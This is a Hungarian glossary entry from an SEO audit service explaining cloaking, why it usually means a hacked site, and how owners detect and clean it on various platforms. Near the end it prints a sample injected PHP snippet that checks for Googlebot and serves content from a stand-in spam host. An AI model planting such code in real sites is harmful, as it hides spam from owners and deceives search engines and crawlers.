Biztonság Szakszó

Cloaking

Szerző: · 6 perc olvasás · Frissítve:
Cloaking - Biztonság (szakszó) a tudástárban
Cloaking - Biztonság | eClick GEO-audit tudástár

A cloaking az, amikor egy oldal más tartalmat ad a keresőrobotnak, mint a valódi látogatónak. A szerver vagy a sablon megnézi, ki kér, és a user-agent vagy az IP-cím alapján eltérő HTML-t küld vissza.

Hogyan működik

A kiszolgáló minden kérésnél lát néhány azonosítót. A leggyakoribb a User-Agent fejléc, emellett az IP-cím és a Referer is szóba jön. A cloaking kód ezek alapján elágazik. Ha a kérő a Googlebot, kap egy tele kulcsszavas, linkfarmos változatot. Ha sima böngésző, kap egy ártalmatlan oldalt.

A lényeg, hogy a szándék nem mindig a tulajdonosé. A magyar KKV-oldalakon a cloaking szinte mindig feltörés eredménye, nem SEO-trükk. Egy SEO-spam feltörés tipikus utolsó lépése pont ez: a támadó elrejti a spamet a tulaj elől, de megmutatja a keresőnek.

Miért nem ugyanaz, mint a személyre szabás

A nyelvi vagy eszköz szerinti eltérés önmagában nem cloaking. A gond akkor kezdődik, ha a robot szisztematikusan mást lát, mint az ember. A határ egyszerű: ha kicseréled a user-agentet böngészőre, és eltűnik a tartalom fele, az cloaking. A nyelvi változatok vagy a reszponzív sablon nem ilyen.

Mit jelent az AI-korszakban

A generatív keresők és az AI-crawlerek ugyanúgy megkapják a bot-nézetet. Amit a támadó a Googlebotnak szán, azt beolvashatja a GPTBot vagy a ClaudeBot is. Onnantól a márkád neve mellé spam-szövegkörnyezet kerül a tréning- és keresési adatokban. Ezt sokkal nehezebb visszacsinálni, mint egy indexből kitakarítani a spam-oldalakat.

Röviden: ha a robot mást lát, mint a látogató, az nem beállítási kérdés, hanem incidens.

Miért fontos

Kereső-oldali következmény

A Google a cloakingot spam-szabálysértésnek tekinti. Manuális intézkedés járhat érte, és ilyenkor nem egy oldal, hanem az egész domain esik ki. A visszaépítés hónapokban mérhető, nem hetekben.

Biztonsági következmény

A cloaking nem hiba, hanem tünet. Ha a kódodban ilyen elágazás fut, azt valaki odatette. Ugyanaz a hozzáférés, amivel ezt beírták, alkalmas adatbázis-olvasásra és fájlfeltöltésre is. A biztonsági átvizsgálás ilyenkor nem opcionális.

Üzleti következmény

A spam-tartalom miatt az oldal bekerülhet a Safe Browsing listákra. A Chrome ekkor piros figyelmeztetést tesz a domain elé. A forgalom nullára esik órák alatt, és a levelezésed kézbesítése is romolhat.

A riportokban ezt látjuk: a tulajdonos hetekig nem vesz észre semmit, mert neki az oldal tökéletesen működik. Az első jel általában a Search Console értesítése vagy a hirtelen forgalomesés.

Kikre vonatkozik

Kire vonatkozik

  • Minden nyilvános weboldalra, ami indexelhető. Céges bemutatkozó, blog, webshop egyaránt.
  • Kiemelten a régi WordPress-oldalakra. Az elavult plugin- és mag-verziók adják a támadási felületet.
  • Olcsó shared tárhelyen futó oldalakra. Egy fertőzött fiók a szomszéd oldalakat is elérheti.
  • Egyedi fejlesztésű oldalakra, ahol saját middleware vagy cache-réteg fut.

Kire nem vonatkozik

  • Zárt, jelszóval védett rendszerekre, amiket egyetlen robot sem ér el.
  • Staging és fejlesztői környezetekre, ha noindex és HTTP-hitelesítés védi őket.
  • Az A/B tesztekre, amennyiben a variánsokat véletlenszerűen, nem bot-azonosítás alapján osztod.

A Shopify és a hazai dobozos rendszerek felhasználői ritkábban érintettek. Ott a sablonszintű kód nem fér hozzá a kiszolgáló logikájához. Ez viszont nem zárja ki, hogy egy rosszindulatú app vagy beillesztett script okozzon eltérést.

Hogyan ellenőrzöd

Lépések

  1. Kérd le az oldalt böngészőként. Nyisd meg a kezdőlapot, és nézd meg a forrást (Ctrl+U).
  2. Kérd le Googlebot user-agenttel. Használj curl-t vagy a devtools Network Conditions paneljét, ahol átírhatod a user-agentet.
  3. Hasonlítsd össze a két HTML-t. Mentsd ki mindkettőt fájlba, és futtass rajtuk diff-et.
  4. Nézd meg a Search Console URL-ellenőrzését. A "Tesztelt oldal megtekintése" mutatja a Google által letöltött HTML-t.
  5. Keress rá gyanús kulcsszavakra. A site:domain.hu keresés az indexben megmutatja a nem odavaló oldalakat.
  6. Ellenőrizd a Biztonsági problémák jelentést a Search Console-ban.

Jó jel

  • A két HTML lényegében azonos, csak a cache-bélyeg vagy egy nonce tér el.
  • A site: keresés kizárólag a saját oldalaidat hozza.
  • A Search Console renderelt képe megegyezik azzal, amit a böngészőben látsz.

Rossz jel

  • A bot-nézetben idegen nyelvű blokkok vagy kimenő linkek vannak.
  • A bot-nézet HTML-je jelentősen hosszabb a látogatóinál.
  • A forrásban display:none alá rejtett linkhalmaz ül.
  • A site: keresés gyógyszer-, kaszinó- vagy hamis márkaoldalakat mutat.
  • A Search Console biztonsági figyelmeztetést jelez.

Mit néz ebből a riport

Az audit a kezdőoldalt kétszer kéri le: egyszer Googlebot user-agenttel, egyszer sima böngészőként. A két válasz lényegi eltérését kritikus hibaként jelzi. A hatókör kód, mert a különbséget a kiszolgáló vagy a sablon állítja elő. A riport ajánlása egyértelmű: ha a Googlebot más tartalmat kap, azonnali kódvizsgálat és takarítás kell.

Hogyan javítod

WordPress

  1. Kapcsold ki az oldalt vagy tedd karbantartásba, amíg vizsgálódsz.
  2. Nézd át a wp-config.php, az index.php és a .htaccess fájlokat. A beszúrt kód általában a fájl elején vagy végén ül.
  3. Keress user-agent vizsgálatot a témában és a mu-plugins könyvtárban: grep -ri "googlebot" wp-content/.
  4. Cseréld le a mag-fájlokat friss letöltésből. Csak a wp-content maradjon.
  5. Távolítsd el az ismeretlen plugineket, és frissítsd a maradékot.
  6. Cserélj minden jelszót: admin, FTP, adatbázis, tárhely-fiók.
  7. Kérj újravizsgálatot a Search Console-ban, ha volt manuális intézkedés.

Shopify

  1. Nézd át a telepített appokat, és töröld az ismeretleneket.
  2. Ellenőrizd a theme.liquid-et beszúrt script-tagekre.
  3. Nézd meg a Script tags API-n keresztül betöltött kódokat.
  4. Vond vissza a gyanús alkalmazások hozzáférését.

Unas

  1. Ellenőrizd a saját HTML-blokkokat és a fejléc-lábléc sablonmezőket.
  2. Nézd át a beillesztett külső scripteket.
  3. Jelezd a támogatásnak, ha az eltérés a rendszer szintjén jelenik meg.

Shoprenter

  1. Nyisd meg a sablon-szerkesztőt, és keress ismeretlen kódrészletet.
  2. Ellenőrizd a beépülő scripteket a beállításokban.
  3. Kérj naplórészletet a szolgáltatótól, ha jogosulatlan belépést gyanítasz.

Egyedi fejlesztés

  1. Keress user-agent elágazást a middleware-ekben és a cache-rétegben.
  2. Vizsgáld a reverse proxy konfigurációt (nginx, Varnish, Cloudflare Workers).
  3. Futtass git status-t és git diff-et a deploy-könyvtárban.
  4. Nézd át a hozzáférési naplókat az első spam-kérés időpontja körül.
  5. Építs újra tiszta forrásból, ne foltozz.

A takarítás után hetekig figyeld az indexet. A spam-oldalak újra megjelenhetnek, ha a belépési pont megmaradt.

Gyakori hibák

  • Csak a tüneti oldalakat törlik. A spam-URL-ek eltűnnek, a hátsó kapu marad, és pár nap múlva minden visszajön.
  • Nem cserélnek jelszót a takarítás után. A támadó ugyanazzal a hozzáféréssel tér vissza.
  • Elhiszik, hogy nincs baj, mert a böngészőben minden rendben. A cloaking lényege pont az, hogy a tulajdonos nem látja.
  • A robots.txt-vel próbálják elrejteni a spam-oldalakat. A robots.txt a feltérképezést tiltja, a már indexelt URL-ek bent maradnak.
  • Összekeverik a személyre szabást a cloakinggal. Nyelvi vagy eszköz szerinti eltérés miatt fölöslegesen átépítik a működő logikát.
  • Nem nézik meg a szerveroldali cache-t. Egy megmérgezett cache-bejegyzés a tiszta kód mellett is spamet szolgál ki.
  • Kihagyják a Search Console biztonsági jelentését. Ott áll a legpontosabb információ arról, mit talált a Google.

Technikai példa

Két lekérés, két user-agent. A különbség azonnal látszik:

curl -sA "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
  https://pelda.hu/ > bot.html

curl -sA "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 \
  (KHTML, like Gecko) Chrome/120.0 Safari/537.36" https://pelda.hu/ > user.html

diff <(wc -c < bot.html) <(wc -c < user.html)
diff bot.html user.html | head -50

Ha a méretek között több tíz kilobájt az eltérés, az riasztó. Nézd meg a diff kimenetét soronként.

Egy tipikus beszúrt PHP-részlet így néz ki:

$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strpos($ua, 'googlebot') !== false) {
    echo file_get_contents('https://spam-szerver.example/payload.txt');
}

A minta mindig ugyanaz: user-agent vizsgálat, majd külső forrásból betöltött tartalom. Ha ilyet találsz a kódbázisban, az nem konfigurációs hiba.

Gyakori kérdések

Cloaking-e, ha mobilon más tartalmat adok, mint asztali gépen?
Nem, ha ugyanazt az elvet alkalmazod a robotra és a látogatóra is. A reszponzív és a külön mobil-sablon is rendben van. A gond akkor keletkezik, ha kifejezetten a bot azonosítója alapján cserélsz tartalmat. A robotnak azt kell látnia, amit az ugyanolyan eszközt használó ember lát.
Honnan tudom, hogy feltörték az oldalam, vagy a fejlesztő hagyott ott valamit?
Nézd meg a fájl módosítási dátumát és a verziókezelő naplóját. Ha az elágazás nincs a repóban, de a szerveren ott van, az beszúrt kód. A hozzáférési napló megmutatja, mikor és honnan írták be. Fejlesztői maradék ritkán tölt be tartalmat külső domainről.
A Google megbüntet, ha már kijavítottam?
Ha volt manuális intézkedés, a Search Console Manuális intézkedések menüpontjában látod. A takarítás után újravizsgálatot kérhetsz, és le kell írnod, mit csináltál. A feloldás általában napokat vesz igénybe. Ha nem volt intézkedés, a rangsor magától rendeződik, ahogy a Google újra feltérképezi az oldalt.
Elég, ha a spam-oldalakat eltávolítom az indexből?
Nem. Az eltávolítás csak a látható következményt szünteti meg, ráadásul ideiglenesen. Amíg a kiszolgáló eltérő tartalmat ad a botnak, a spam vissza fog kerülni. Először a kódot takarítsd, utána foglalkozz az indexszel.
Az AI-crawlerek is látják a rejtett tartalmat?
Igen, ha a cloaking kód általánosan a botokra szűr. Sok beszúrt kód egyszerűen minden nem böngésző user-agentre elágazik. Ilyenkor a GPTBot, a ClaudeBot és a PerplexityBot is a spam-változatot kapja. Ennek a nyoma sokkal tovább megmarad, mint a Google indexében.

Források

Kapcsolódó fogalmak

A te oldaladon hogy áll a(z) „Cloaking”?

Futtass egy SEO-auditot: pontszám, fejlesztői ítélet, a leggyorsabb javítások, és minden tételhez bizonyíték.

Ingyenes SEO-audit indítása